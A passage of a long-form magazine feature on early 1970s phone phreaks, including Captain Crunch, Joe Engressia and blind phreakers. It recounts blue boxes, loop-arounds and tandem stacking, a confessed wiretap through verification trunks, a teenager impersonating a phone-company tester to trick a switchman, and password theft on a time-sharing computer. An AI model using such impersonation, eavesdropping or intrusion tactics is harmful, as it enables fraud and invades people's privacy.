free call), Marty Freeman (code word for M-F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ter Perpendicular Pimple, Alefnull, and The Cheshire Cat.  He makes chec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ongside the names of those among these top twelve who are blind.  There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ve chec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sk him who this Captain Crunch person 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The Captain.  He's probably the most legendary phone phreak.  He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mself Captain Crunch after the notorious Cap'n Crunch 2600 whis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ral years ago, Gilbertson explains, the makers of Cap'n Crunch breakf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eal offered a toy-whistle prize in every box as a treat for the Cap'n Crun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  Somehow a phone phreak discovered that the toy whistle just happen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duce a perfect 2600-cycle tone.  When the man who calls himself Cap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unch was transferred overseas to England with his Air Force unit, he w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ive scores of calls from his friends and "mute" them -- make them fre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ge to them -- by blowing his Cap'n Crunch whistle into his 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tain Crunch is one of the older phone phreaks," Gilbertson tells me.  "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engineer who once got in a little trouble for fooling around with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he can't stop.  Well, they guy drives across country in a Volkswagen v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n entire switchboard and a computerized super-sophisticated M-F-er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  He'll pull up to a phone booth on a lonely highway somewhere, snak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ble out of his bus, hook it onto the phone and sit for hours, days someti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ing calls zipping back and forth across the country, all ov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 at my motel, I dialed the number he gave me for "Captain Crunch" and ask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G---- T-----, his real name, or at least the name he uses when he'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shing into a phone booth beeping out M-F tones faster than a speeding bull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zipping phantomlike through the phone company's long-distance l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G---- T----- answered the phone and I told him I was preparing a story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quire about phone phreaks, he became very indigna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do that.  I don't do that anymore at all.  And if I do it, I do it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reason and one reason only.  I'm learning about a system.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is a System.  A computer is a System, do you understand?  If I do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 it is only to explore a system. Computers, systems, that's my ba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company is nothing but a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one of tightly restrained excitement enters the Captain's voice when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s talking about systems.  He begins to pronounce each syllable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shed deliberation of an obscene cal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 Bell is a system I want to explore.  It's a beautiful system, you know,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 Bell screwed up.  It's terrible because Ma Bell is such a beautiful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he screwed up.  I learned how she screwed up from a couple of blind ki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 wanted me to build a device.  A certain device.  They said it could ma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e calls.  I wasn't interested in free calls.  But when these blind kids t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I could make calls into a computer, my eyes lit up.  I wanted to learn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s.  I wanted to learn about Ma Bell's computers.  So I build the li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vice, but I built it wrong and Ma Bell found out.  Ma Bell can detect th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that.  Ma Bell knows.  So I'm strictly rid of it now.  I don't do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ept for learning purposes."  He pauses. "So you want to write an artic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paying for this call?  Hang up and call this number."  He gives m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in a area code a thousand miles away of his own.  I dial the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again.  This is Captain Crunch.  You are speaking to me on a toll-f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p-around in Portland, Oregon.  Do you know what a toll-free loop around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tell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explains to me that almost every exchange in the country has open t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which allow other exchanges to test their connections with it.  Mos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numbers occur in consecutive pairs, such as 302 956-0041 and 30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56-0042.  Well, certain phone phreaks discovered that if two people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where in the country dial the two consecutive numbers they can talk toge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s if one had called the other's number, with no charge to either of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cour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our voice is looping around in a 4A switching machine up there in Cana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ipping back down to me," the Captain tells me.  "My voice is looping around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nd back down to you.  And it can't ever cost anyone money.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s and I have compiled a list of many many of these numbers.  You would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prised if you saw the list.  I could show it to you.  But I won't.  I'm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at now.  I'm not out to screw Ma Bell.  I know better.  If I do an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or the pure knowledge of the System.  You can learn to do fantast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Have you ever heard eight tandems stacked up?  Do you know the s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andems stacking and unstacking?  Give me your phone number.  Okay. Hang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and wait a minu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ightly less than a minute later the phone rang and the Captain was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his voice sounding far more excited, almost aro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ed to show you what it's like to stack up tandems.  To stack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ndems." (Whenever the Captain says "stack up" it sounds as if he is lic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li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do you like the connection you're on now?" the Captain asks me. "It'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w tandem.  A raw tandem.  Ain't nothin' up to it but a tandem.  Now I'm go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w you what it's like to stack up.  Blow off.  Land in a far away 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tack that tandem up, whip back and forth across the country a few ti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shoot on up to Mosc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Captain Crunch continues.  "Listen.  I've got line tie on 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board here, and I'm gonna let you hear me stack and unstack tand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to this.  It's gonna blow your mi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I hear a super rapid-fire pulsing of the flutelike phone tones, the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use, then another popping burst of tones, then another, then another.  Ea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rst is followed by a beep-kachink s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have now stacked up four tandems," said Captain Crunch, sounding some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That's four tandems stacked up.  Do you know what that mean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s I'm whipping back and forth, back and forth twice, across the coun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coming to you.  I've been known to stack up twenty tandems at a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just like I said, I'm going to shoot up to Mosc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 new, longer series of beeper pulses over the line, a brief sil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a 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answers a far-off vo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Is this the American Embassy Mosc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 sir.  Who is this calling?" says the vo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  This is test board here in New York.  We're calling to check o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rcuits, see what kind of lines you've got.  Everything okay ther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c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yes, how are things t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Well, everything okay, I gu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ay.  Thank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hang up, leaving a confused series of beep-kachink sounds hanging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d-ether in the wake of the call before dissolving a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ptain is pleased.  "You believe me now, don't you?  Do you know what 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to do?  I'd just like to call up your editor at Esquire and show him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t sounds like to stack and unstack tandems. I'll give him a show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low his mind.  What's his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sk the Captain what kind of device he was using to accomplish all his fea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ptain is pleased at the ques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ould tell it was special, couldn't you?"  Ten pulses per second. Tha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ster than the phone company's equipment.  Believe me, this unit is the m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mous unit in the country.  There is no other unit like it.  Believe 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 I've heard about it.  Some other phone phreaks have told me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have been referring to my, ahem, unit?  What is it they said? Just ou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iosity, did they tell you it was a highly sophisticated computer-oper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t, with acoustical coupling for receiving outputs and a switch-board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ltiple-line-tie capability?  Did they tell you that the frequency toler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guaranteed to be not more than .05 percent?  The amplitude tolerance l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 .01 decibel?  Those pulses you heard were perfect.  They just come fa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 the phone company. Those were high-precision op-amps.  Op-amp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rumentation amplifiers designed for ultra-stable amplification, super-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tortion and accurate frequency response.  Did they tell you it can ope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emperatures from -55 degrees C to +125 degrees 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dmit that they did not tell me all th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uilt it myself," the Captain goes on.  "If you were to go out and bu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onents from an industrial wholesaler it would cost you at least $1500.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worked for a semiconductor company and all this didn't cost me a cent.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 I mean?  Did they tell you about how I put a call comple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the world?  I'll tell you how I did it.  I M-Fed Tokyo inward, wh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ed me to India, India connected me to Greece, Greece connected m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toria, South Africa, South Africa connected me to South America, I went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th America to London, I had a London operator connect me to a New Y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I had New York connect me to a California operator who rang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 to me.  Needless to say I had to shout to hear myself.  But the echo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r out.  Fantastic.  Delayed.  It was delayed twenty seconds, but I could h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self talk to mysel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ean you were speaking into the mouthpiece of one phone sending your vo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the world into your ear through a phone on the other side of your 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sked the Captain.  I had a vision of something vaguely autoerotic going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complex electronic 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s right," said the Captain.  "I've also sent my voice around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way, going east on one phone, and going west on the other, going throu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ble one way, satellite the other, coming back together at the same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ging the two phones simultaneously and picking them up and whipping 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ice both ways around the world back to me. Wow.  That was a mind blow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ean you sit there with both phones on your ear and talk to your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the world," I said incredulous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Um hum.  That's what I do.  I connect the phone together and sit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al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do you say?  What do you say to yourself when you're connec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know.  Hello test one two three," he says in a low-pitched vo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test one two three," he replied to himself in a high-pitched vo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test one two three," he repeats again, low-pitch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test one two three," he replies, high-pitch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ometimes do this: Hello Hello Hello Hello, Hello, hello," he trails off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s into laugh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y Captain Crunch Hardly Ever Taps Phones Anym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internal phone-company codes, phone phreaks have learned a simple meth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apping phones.  Phone-company operators have in front of them a board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ds verification jacks.  It allows them to plug into conversations in cas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ergency, to listen in to a line to determine if the line is busy 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rcuits are busy.  Phone phreaks have learned to beep out the codes which l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 to a verification operator, tell the verification operator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men from some other area code testing out verification trunks. Onc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hooks them into the verification trunk, they disappear into the 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ll practical purposes, slip unnoticed into any one of the 10,000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0,000 numbers in that central office without the verification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ing what they're doing, and of course without the two parties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on knowing there is a phantom listener present on their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ward the end of my hour-long first conversation with him, I asked the Cap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he ever tapped pho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I don't do that.  I don't think it's right," he told me firmly.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the power to do it but I don't... Well one time, just one time, I hav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mit that I did.  There was this girl, Linda, and I wanted to find out...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I tried to call her up for a date. I had a date with her the l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ekend and I thought she liked me.  I called her up, man, and her line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y, and I kept calling and it was still busy.  Well, I had just learned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ystem of jumping into lines and I said to myself, 'Hmmm.  Why not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if it works. It'll surprise her if all of a sudden I should pop up on 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It'll impress her, if anything.'  So I went ahead and did it.  I M-F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the line.  My M-F-er is powerful enough when patched directly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uthpiece to trigger a verification trunk without using an operator the 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ther phone phreaks have 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lipped into the line and there she was talking to another boyfri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ing sweet talk to him.  I didn't make a sound because I was so disgus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 waited there for her to hang up, listening to her making sweet talk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guy.  You know.  So as soon as she hung up I instantly M-F-ed her up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said was, 'Linda, we're through.'  And I hung up.  And it blew her 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  She couldn't figure out what the hell happen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at was the only time.  I did it thinking I would surprise her, imp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  Those were all my intentions were, and well, it really kind of hurt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tty badly, and... and ever since then I don't go into verification trun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ments later my first conversation with the Captain comes to a clo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he says, his spirits somewhat cheered, "listen.  What you are go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ear when I hang up is the sound of tandems unstacking. Layer after layer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ndems unstacking until there's nothing left of the stack, until it melts a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nothing.  Cheep, cheep, cheep, cheep," he concludes, his voice descen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 whisper with each chee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hangs up.  The phone suddenly goes into four spasms: kachink cheep. Kachi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ep kachink cheep kachink cheep, and the complex connection has wiped it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like the Cheshire cat's sm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F Boogie Blu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xt number I choose from the select list of phone-phreak alumni, prepa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me by the blue-box inventor, is a Memphis number.  It is the number of Jo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gressia, the first and still perhaps the most accomplished blind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ee years ago Engressia was a nine-day wonder in newspapers and magazines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America because he had been discovered whistling free long-di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ons for fellow students at the University of South Florida.  Engress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born with perfect pitch: he could whistle phone tones better tha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company's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gressia might have gone on whistling in the dark for a few friends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t of his life if the phone company hadn't decided to expose him.  He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ed, disciplined by the college, and the whole case became public.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ths following media reports of his talent, Engressia began receiving str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s.   There were calls from a group of kids in Los Angeles who could do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y strange things with the quirky General Telephone and Electronics circui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L.A. suburbs.  There were calls from a group of mostly blind kid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ifornia, who had been doing some interesting experiments with Cap'n Crun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stles and test loops.  There was a group in Seattle, a group in Cambrid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sachusetts, a few from New York, a few scattered across the country.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m had already equipped themselves with cassette and electronic M-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vices.  For some of these groups, it was the first time they knew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xposure of Engressia was the catalyst that linked the sepa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phreak centers together.  They all called Engressia.  They talked to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what he was doing and what they were doing.  And then he told them --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ttered regional centers and lonely independent phone phreakers -- about ea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gave them each other's numbers to call, and within a year the scatte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phreak centers had grown into a nationwide under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Engressia is only twenty-two years old now, but along the phone-phr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he is "the old man," accorded by phone phreaks something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verence the phone company bestows on Alexander Graham Bell.  He seldom n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ake calls anymore.  The phone phreaks all call him and let him know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tricks, new codes, new techniques they have learned.  Every night he s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sightless spider in his little apartment receiving messages from e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ndril of his web.  It is almost a point of pride with Joe that they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hen I reached him in his Memphis apartment that night, Joe Engressia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ely, jumpy and ups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m glad somebody called.  I don't know why tonight of all nights I do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any calls.  This guy around here got drunk again tonight and propositio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gain.  I keep telling him we'll never see eye to eye on this subject,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 I mean.  I try to make light of it, you know, but he doesn't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 can head him out there getting drunker and I don't know what he'll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  It's just that I'm really all alone here, just moved to Memphis,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rst time I'm living on my own, and I'd hate for it to all collapse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won't go to bed with him.  I'm just not very interested in sex and e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can't see him I know he's ug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hear that?  That's him banging a bottle against the wall out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nice.  Well forget about it.  You're doing a story on phone phrea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to this.  It's the MF Boogie Blu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e enough, a jumpy version of Muskrat Ramble boogies its way over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ch note one of those long-distance phone tones.  The music stops.  A hu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aring voice blasts the phone off my ear: "AND THE QUESTION IS..." roar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ice, "CAN A BLIND PERSON HOOK UP AN AMPLIFIER ON HIS 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oar ceases.  A high-pitched operator-type voice replaces it. "This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thern Braille Tel. &amp; Tel.  Have tone, will ph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succeeded by a quick series of M-F tones, a swift "kachink" and a dee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ssuring voice: "If you need home care, call the visiting-nurses associ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National time in Honolulu is 4:32 p.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back in his Joe voice again: "Are we seeing eye to eye? 'Si, si,' sai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ind Mexican.  Ahem.  Yes.  Would you like to know the weather in Toky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wift manic sequence of phone-phreak vaudeville stunts and blind-boy jok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ages to keep Joe's mind off his tormentor only as long as it la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ason I'm in Memphis, the reason I have to depend on that homosexual gu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hat this is the first time I've been able to live on my own and mak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s on my own.  I've been banned from all central offices around hom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rida, they knew me too well, and at the University some of my f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holars were always harassing me because I was on the dorm pay phone a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and making fun of me because of my fat ass, which of course I do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my physical fatness program, but I don't like to hear it every day, and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phone trip and I can't phone phreak, I can't imagine what I'd do, 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n devoting three quarters of my life to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oved to Memphis because I wanted to be on my own as well as because it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Number 5 crossbar switching system and some interesting little independ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company districts nearby and so far they don't seem to know who I am so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go on phone tripping, and for me phone tripping is just as important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phreak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tripping, Joe explains, begins with calling up a central-office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He tells the switchman in a polite earnest voice that he's a bl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lege student interested in telephones, and could he perhaps have a gui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ur of the switching station?  Each step of the tour Joe likes to touch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 relays, caress switching circuits, switchboards, crossbar arrang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when Joe Engressia phone phreaks he feels his way through the circuitry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untry garden of forking paths, he feels switches shift, relays shu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ossbars swivel, tandems engage and disengage even as he hears -- with perf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tch -- his M-F pulses make the entire Bell system dance to his tu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one month ago Joe took all his savings out of his bank and left home,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motional protests of his mother.  "I ran away from home almost," he lik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ay.  Joe found a small apartment house on Union Avenue and began ma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trips.  He'd take a bus a hundred miles south in Mississippi to see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ld-fashioned Bell equipment still in use in several states, which had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zzling.  He'd take a bus three hundred miles to Charlotte, North Carolina,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 at some brand-new experimental equipment.  He hired a taxi to drive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elve miles to a suburb to tour the office of a small phone company with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esting idiosyncrasies in its routing system.  He was having the tim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life, he said, the most freedom and pleasure he had kn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at month he had done very little long-distance phone phreaking from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n phone.  He had begun to apply for a job with the phone company, he told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e wanted to stay away from anything illeg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kind of job will do, anything as menial as the most lowly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s probably all they'd give me because I'm blind.  Even though I probab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more than most switchmen.  But that's okay.  I want to work for Ma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hate Ma Bell the way Gilbertson and some phone phreaks do.  I do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t to screw Ma Bell.  With me it's the pleasure of pure knowledge.  The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hing beautiful about the system when you know it intimately the way I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know how much they know about me here.  I have a very intui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 for the condition of the line I'm on, and I think they're monitoring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 and on lately, but I haven't been doing much illegal.  I have to make a f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s to switchmen once in a while which aren't strictly legal, and once I to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acid trip and was having these auditory hallucinations as if I were trapp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se planes were dive-bombing me, and all of sudden I had to phone phr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re.  For some reason I had to call Kansas City, but that's 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Warning Is Delive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is point -- one o'clock in my time zone -- a loud knock on my motel-ro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or interrupts our conversation.  Outside the door I find a uniformed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uard who informs me that there has been an "emergency phone call" for me wh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been on the line and that the front desk has sent him up to let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seconds after I say good-bye to Joe and hang up, the phone r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 were you talking to?" the agitated voice demands.  The voice belong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tain Crunch.  "I called because I decided to warn you of something.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ided to warn you to be careful.  I don't want this information you ge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to the radical underground.  I don't want it to get into the wrong h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would you say if I told you it's possible for three phone phreak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turate the phone system of the nation.  Saturate it.  Busy it out.  All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 know how to do this.  I'm not gonna tell.  A friend of mine has alrea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turated the trunks between Seattle and New York.  He did it wit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ized M-F-er hitched into a special Manitoba exchange.  But there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easier ways to do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hree people?  I ask.  How is that possi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you ever heard of the long-lines guard frequency?  Do you know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cking tandems with 17 and 2600?  Well, I'd advise you to find out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gonna tell you.  But whatever you do, don't let this get into the h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radical under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r Gilbertson, the inventor, confessed that while he had always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keptical about the Captain's claim of the sabotage potential of trunk-ty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phreaks, he had recently heard certain demonstrations which convinced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ptain was not speaking idly. "I think it might take more than th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depending on how many machines like Captain Crunch's were avail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even though the Captain sounds a little weird, he generally turns ou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what he's talking ab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Captain Crunch continues in his admonitory tone, "you know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nger phone phreaks call Moscow all the time.  Suppose everybody were to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cow.  I'm no right-winger.  But I value my life.  I don't want the Comm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over and dropping a bomb on my head. That's why I say you've got t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eful about who gets this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ptain suddenly shifts into a diatribe against those phone phreaks wh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like the phone compan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don't understand, but Ma Bell knows everything they do.  Ma Bell kn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is this line hot?  I just heard someone tap in.  I'm not paranoid,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detect things like that.  Well, even if it is, they know that I know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know that I have a bulk eraser.  I'm very clean."  The Captain pau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idently torn between wanting to prove to the phone-company monitors that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es nothing illegal, and the desire to impress Ma Bell with his prowess.  "M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 knows how good I am.  And I am quite good.  I can detect reversals, tand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everything that goes on on a line.  I have relative pitch now.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 that means?  My ears are a $20,000 piece of equipment.  With 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rs I can detect things they can't hear with their equipment.  I've h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loyment problems.  I've lost jobs.  But I want to show Ma Bell how good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  I don't want to screw her, I want to work for her.  I want to do goo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r.  I want to help her get rid of her flaws and become perfect.  That's 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one goal in life now."  The Captain concludes his warnings and tells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has to be going.  "I've got a little action lined up for tonight,"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ins and hangs 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I hang up for the night, I call Joe Engressia back.  He reports that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rmentor has finally gone to sleep -- "He's not blind drunk, that's the way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ahem, yes; but you might say he's in a drunken stupor."  I make a dat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sit Joe in Memphis in two da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Phone Phreak Call Takes Care of Busin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xt morning I attend a gathering of four phone phreaks in  -----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ifornia suburb).  The gathering takes place in a comfortable split-lev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e in an upper-middle-class subdivision.  Heaped on the kitchen table ar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able cassette recorders, M-F cassettes, phone patches, and line ties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r phone phreaks present.  On the kitchen counter next to the telephone i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e-box-size blue box with thirteen large toggle switches for the ton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ents of the host phone phreak, Ralph, who is blind, stay in the living ro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ir sighted children.  They are not sure exactly what Ralph and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iends do with the phone or if it's strictly legal, but he is blind and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pleased he has a hobby which keeps him bus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roup has been working at reestablishing the historic "2111" con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opening some toll-free loops, and trying to discover the dimensions of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m to be new initiatives against phone phreaks by phone-company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not long before I get a chance to see, to hear, Randy at work. Randy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n among the phone phreaks as perhaps the finest con man in the game.  Ran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blind.  He is pale, soft and pear-shaped, he wears baggy pants and a wrink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ylon white sport shirt, pushes his head forward from hunched should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what like a turtle inching out of its shell.  His eyes wander, crossing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rossing, and his forehead is somewhat pimply.  He is only sixteen yea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hen Randy starts speaking into a telephone mouthpiece his voice becomes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unningly authoritative it is necessary to look again to convince yourself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s from a chubby adolescent Randy.  Imagine the voice of a crack oil-ri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eman, a tough, sharp, weather-beaten Marlboro man of forty.  Imagin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ice of a brilliant performance-fund gunslinger explaining how he beat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 Jones by thirty percent.  Then imagine a voice that could make those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 like Stepin Fetchit.  That is sixteen-year-old Randy's vo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is speaking to a switchman in Detroit.  The phone company in Detroit h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sed up two toll-free loop pairs for no apparent reason, although heavy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phone phreaks all over the country may have been detected.  Randy is tel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witchman how to open up the loop and make it free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are you, buddy.  Yeah. I'm on the board in here in Tulsa, Oklahoma,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ve been trying to run some tests on your loop-arounds and we find'em bus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n both sides.... Yeah, we've been getting a 'BY' on them, what d'ya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you drop cards on 'em?  Do you have 08 on your number group?  Oh tha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ay, we've had this trouble before, we may have to go after the circu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mme give 'em to you: your frame is 05, vertical group 03, horizontal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tical file 3.  Yeah, we'll hang on here.... Okay, found it?  Good.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we'd like to clear that busy out.  Right.  All you have to do is look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key on the mounting plate, it's in your miscellaneous trunk frame.  Ok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Now pull your key from NOR over the LCT.  Yeah. I don't know why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ppened, but we've been having trouble with that one.  Okay.  Thanks a l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lla.  Be seein' y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ndy hangs up, reports that the switchman was a little inexperienced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p-around circuits on the miscellaneous trunk frame, but that the loop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n returned to its free-call stat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ighted, phone phreak Ed returns the pair of numbers to the active-stat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umn in his directory.  Ed is a superb and painstaking researcher.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most Talmudic thoroughness he will trace tendrils of hints through soft-w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zes of intervening phone-company circuitry back through complex linkage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relays to find the location and identity of just one toll-free lo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pends hours and hours, every day, doing this sort of thing.  He has someh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iled a directory of eight hundred "Band-six in-WATS numbers" locat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forty states.  Band-six in-WATS numbers are the big 800 numbers --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s that can be dialed into free from anywhere in the coun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 the researcher, a nineteen-year-old engineering student, is also a super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cian.  He put together his own working blue box from scratch at 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nteen.  (He is sighted.)  This evening after distributing the latest iss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his in-WATS directory (which has been typed into Braille for the blind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s), he announces he has made a major new breakthroug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inally tested it and it works, perfectly. I've got this switching matr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converts any touch-tone phone into an M-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ones you hear in touch-tone phones are not the M-F tones that operat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distance switching system.  Phone phreaks believe A.T.&amp;T. had delibera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ped touch tones with a  different set of frequencies to avoid putt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x master M-F tones in the hands of every touch-tone owner.  Ed's compl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matrix puts the six master tones, in effect put a blue box,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s of every touch-tone own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 shows me pages of schematics, specifications and parts lists. "It's not eas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uild, but everything here is in the Heathkit catalo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 asks Ralph what progress he has made in his attempts to reestablis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term open conference line for phone phreaks.  The last big confer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istoric "2111" conference -- had been arranged through an unused Tel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board trunk somewhere in the innards of a 4A switching machin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ncouver, Canada.  For months phone phreaks could M-F their way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ncouver, beep out 604 (the Vancouver area code) and then beep out 2111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l phone-company code for Telex testing), and find themselves at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day or night, on an open wire talking with an array of phone phreaks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ast to coast, operators from Bermuda, Tokyo and London who are phone-phr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mpathizers, and miscellaneous guests and technical experts.  The con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a massive exchange of information.  Phone phreaks picked each oth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ains clean, then developed new ways to pick the phone company's brains cle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lph gave M F Boogies concerts with his home-entertainment-type electr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 Captain Crunch demonstrated his round-the-world prowess with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orious computerized unit and dropped leering hints of the "action" he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with his girl friends.  (The Captain lives out or pretends to live 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ral kinds of fantasies to the gossipy delight of the blind phone phrea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o urge him on to further triumphs on behalf of all of them.)  The some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wdy Northwest phone-phreak crowd let their bitter internal feud spill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o the peaceable conference line, escalating shortly into guerrilla warf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l the East Coast international tone relations expert demonstrated new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ed direct M-F routes to central offices on the island of Bahrein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sian Gulf, introduced a new phone-phreak friend of his in Pretoria,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ined the technical operation of the new Oakland-to Vietnam linka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y phone phreaks pick up spending money by M-F-ing calls from relative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etnam G.I.'s, charging $5 for a whole hour of trans-Pacific convers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y and night the conference line was never dead.  Blind phone phreaks all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untry, lonely and isolated in homes filled with active sighted broth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isters, or trapped with slow and unimaginative blind kids in straitjack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hools for the blind, knew that no matter how late it got they could dial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ference and find instant electronic communion with two or three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ind kids awake over on the other side of America.  Talking together o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hookup, the blind phone phreaks say, is not much different from be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together. Physically, there was nothing more than a two-inch-square wa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itanium inside a vast machine on Vancouver Island.  For the blind ki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there&lt; meant an exhilarating feeling of being in touch, through a kind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kill and magic which was peculiarly their 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April 1, however, the long Vancouver Conference was shut off.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s knew it was coming.  Vancouver was in the process of converting from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p-by-step system to a 4A machine and the 2111 Telex circuit was to be wip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in the process.  The phone phreaks learned the actual day on whic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erence would be erased about a week ahead of time over the phone compan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l-news-and-shop-talk recor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next frantic seven days every phone phreak in America was on and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2111 conference twenty-four hours a day.  Phone phreaks who were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rning the game or didn't have M-F capability were boosted up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erence by more experienced phreaks so they could get a glimpse of wha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like before it disappeared.  Top phone phreaks searched distant area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new conference possibilities without success.  Finally in the early mor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pril 1, the end c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feel it coming a couple hours before midnight," Ralph remember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feel something going on in the lines.  Some static began showing up,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whistling wheezing sound.  Then there were breaks.  Some people got c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 and called right back in, but after a while some people were finding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cut off and couldn't get back in at all.  It was terrible.  I los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one a.m., but managed to slip in again and stay on until the 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ed... I think it was about four in the morning.  There were four of us st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n when the conference disappeared into nowhere for good.  We all tr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F up to it again of course, but we got silent termination.  There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t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egendary Mark Bernay Turns Out To Be "The Midnight Skulk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 Bernay.  I had come across that name before.  It was on Gilberts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 list of phone phreaks.  The California phone phreaks had spoken o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sterious Mark Bernay as perhaps the first and oldest phone phreak on the W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ast.  And in fact almost every phone phreak in the West can trace his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ther directly to Mark Bernay or to a disciple of Mark Bern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seems that five years ago this Mark Bernay (a pseudonym he chose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mself) began traveling up and down the West Coast pasting tiny sticker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books all along his way.  The stickers read something like "Want to h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interesting tape recording? Call these numbers."  The numbers that follow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toll-free loop-around pairs. When one of the curious called on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he would hear a tape recording pre-hooked into the loop by Bernay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ined the use of loop-around pairs, gave the numbers of several mor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ed by telling the caller, "At six o'clock tonight this recording will s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and your friends can try it out.  Have fu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isappointed by the response at first," Bernay told me, when I fin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ched him at one of his many numbers and he had dispensed with the usual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do anything illegal" formalities which experienced phone phreaks op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convers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ent all over the coast with these stickers not only on pay phones, but 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w them in front of high schools in the middle of the night, I'd leave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obtrusively in candy stores, scatter them on main streets of small towns.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hardly anyone bothered to try it out.  I would listen in for hour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urs after six o'clock and no one came on.  I couldn't figure out why peo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n't be interested.  Finally these two girls in Oregon tried it ou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ld all their friends and suddenly it began to spre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his Johny Appleseed trip Bernay had already gathered a sizable group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rly pre-blue-box phone phreaks together on loop-arounds in Los Ange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rnay does not claim credit for the original discovery of the loop-a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He attributes the discovery to an eighteen-year-old reform school k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Long Beach whose name he forgets and who, he says, "just disappeared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y."  When Bernay himself discovered loop-arounds independently, from clue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readings in old issues of the Automatic Electric Technical Journal,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nd dozens of the reform-school kid's friends already using them. However,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one of Bernay's disciples in Seattle that introduced phone phreaking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ind kids.  The Seattle kid who learned about loops through Bernay's reco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ld a blind friend, the blind kid taught the secret to his friends at a wi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p for blind kids in Los Angeles.  When the camp session was over these ki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k the secret back to towns all over the West.  This is how the orig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ind kids became phone phreaks.  For them, for most phone phreaks in gener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as the discovery of the possibilities of loop-arounds which led them on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r more serious and sophisticated phone-phreak methods, and which gave them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um for sharing their discove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year later a blind kid who moved back east brought the technique to a bl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ds' summer camp in Vermont, which spread it along the East Coast.  All from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 Bernay stick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rnay, who is nearly thirty years old now, got his start when he was fift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is family moved into an L.A. suburb serviced by General Telephon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s equipment.  He became fascinated with the differences between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G.T.&amp;E. equipment.  He learned he could make interesting things happen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efully timed clicks with the disengage button.  He learned to interpr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tle differences in the array of clicks, whirrs and kachinks he could hear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lines.  He learned he could shift himself around the switching relay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A. area code in a not-too-predictable fashion by interspersing his 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ok-switch clicks with the clicks within the line. (Independent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ies -- there are nineteen hundred of them still left, most of them ti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land principalities in Ma Bell's vast empire -- have always been favori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phone phreaks, first as learning tools, then as Archimedes platforms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to manipulate the huge Bell system.  A phone phreak in Bell terr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often M-F himself into an independent's switching system, with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iosyncrasies which can give him marvelous leverage over the Bell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a real affection for Automatic Electric Equipment," Bernay told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a lot of things you can play with.  Things break down in intere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rtly after Bernay graduated from college (with a double major in chem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hilosophy), he graduated from phreaking around with G.T.&amp;E. to the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itself, and made his legendary sticker-pasting journey north alo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ast, settling finally in Northwest Pacific Bell territory.  He discove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f Bell does not break down as interestingly as G.T.&amp;E., it neverthel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ers a lot of "things to play wi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rnay learned to play with blue boxes.  He established his own pers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board and phone-phreak research laboratory complex.  He continued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phreak evangelism with ongoing sticker campaigns. He set up two reco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s, one with instructions for beginning phone phreaks, the other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st news and technical developments (along with some advanced instr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thered from sources all over the coun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days, Bernay told me, he had gone beyond phone-phreaking itself. "La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enjoying playing with computers more than playing with phones.  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sonal thing in computers is just like with phones, I guess -- the kick i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ding out how to beat the system, how to get at things I'm not suppos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about, how to do things with the system that I'm not supposed to be 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a matter of fact, Bernay told me, he had just been fired from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programming job for doing things he was not supposed to be able to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had been working with a huge time-sharing computer owned by a l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poration but shared by many others.  Access to the computer was limit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se programmers and corporations that had been assigned certain passwo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each password restricted its user to access to only the one section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cordoned off from its own information storager.  The password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ented companies and individuals from stealing each other's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igured out how to write a program that would let me read everyone el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word," Bernay reports.  "I began playing around with passwords.  I beg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ting the people who used the computer know, in subtle ways, that I k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r passwords.  I began dropping notes to the computer supervisors with hi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 knew what I know. I signed them 'The Midnight Skulker.'  I kept get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verer and cleverer with my messages and devising ways of showing them what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do. I'm sure they couldn't imagine I could do the things I was sh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  But they never responded to me.  Every once in a while they'd chang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words, but I found out how to discover what the new ones were, and I l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 know.  But they never responded directly to the Midnight Skulker.  I e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ally designed a program which they could use to prevent my program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ding out what it did.  In effect I told them how to wipe me ou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dnight Skulker.  It was a very clever program.  I started leaving clues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self.  I wanted them to try and use it and then try to come up with some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around that and reappear again.  But they wouldn't play.  I want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caught.  I mean I didn't want to get caught personally, but I wanted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notice me and admit that they noticed me.  I wanted them to attemp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pond, maybe in some interesting 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ally the computer managers became concerned enough about the threa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stealing to respond.  However, instead of using The Midn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kulker's own elegant self-destruct program, they called in their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sonnel, interrogated everyone, found an informer to identify Bernay a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dnight Skulker, and fired hi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first the security people advised the company to hire me full-tim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rch out other flaws and discover other computer freaks.  I might have lik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But I probably would have turned into a double double agent rather t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ouble agent they wanted.  I might have resurrected The Midnight Skul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ied to catch myself.  Who knows?  Anyway, the higher-ups turned the wh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a d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Tap the F.B.I.'s Crime Control Computer in the Comfort of Your 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e, Perha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freaking may be the wave of the future.  It suits the phone-phr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sibility perfectly.  Gilbertson, the blue-box inventor and a lifelong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 has also gone on from phone-phreaking to computer-freaking.  Before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into the blue-box business Gilbertson, who is a highly skilled program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vised programs for international currency arbitr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he began playing with computers in earnest when he learned he could use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e box in tandem with the computer terminal installed in his apartment b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rumentation firm he worked for.  The print-out terminal and keyboard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ped with acoustical coupling, so that by coupling his little iv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ncess phone to the terminal and then coupling his blue box on that, he c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F his way into other computers with complete anonymity, and without ch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and re-program them at will; feed them false or misleading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p and steal from them.  He explained to me that he taps computers by busy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all the lines, then going into a verification trunk, listening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words and instructions one of the time sharers uses, and them M-F-ing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itating them.  He believes it would not be impossible to creep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B.I's crime control computer through a local police computer terminal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 around with the F.B.I.'s memory banks.  He claims he has succeed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rogramming a certain huge institutional computer in such a way that it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doned off an entire section of its circuitry for his personal use, and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ame time conceals that arrangement from anyone else's notice.  I have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able to verify this clai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Captain Crunch, like Alexander Graham Bell (pseudonym o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gruntled-looking East Coast engineer who claims to have invented the bl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 and now sells black and blue boxes to gamblers and radical heavies),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phone phreaks, Gilbertson began his career trying to rip off pay phones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eenager.  Figure them out, then rip them off.  Getting his dime back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ay phone is the phone phreak's first thrilling rite of passage.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rning the usual eighteen different ways of getting his dime back, Gilbert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rned how to make master keys to coin-phone cash boxes, and get every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se's dimes back.  He stole some phone-company equipment and put together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n home switchboard with it.  He learned to make a simple "bread-box"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kind used by bookies in the Thirties (bookie gives a number to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ting clients; the phone with that number is installed in some widow lad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artment, but is rigged to ring in the bookie's shop across town, cops tr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 betting number and find nothing but the wi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long after that afternoon in 1968 when, deep in the stacks of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gineering library, he came across a technical journal with the phone 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quencies and rushed off to make his first blue box, not long after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lbertson abandoned a very promising career in physical chemistry and beg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ling blue boxes for $1,500 apie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leave physical chemistry.  I just ran out of interesting thing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rn," he told me one evening.  We had been talking in the apartmen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 who served as the link between Gilbertson and the syndicate in arrang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ig $300,000 blue-box deal which fell through because of legal trou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has been some smok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more interesting things to learn," he continues.  "Physical chemistry tur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to be a sick subject when you take it to its highest level.  I don't k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think I could explain to you how it's sick.  You have to be there.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get, I don't know, a false feeling of omnipotence.  I suppose it's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phreaking that way.  This huge thing is there.  This whole syste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holes in it and you slip into them like Alice and you're 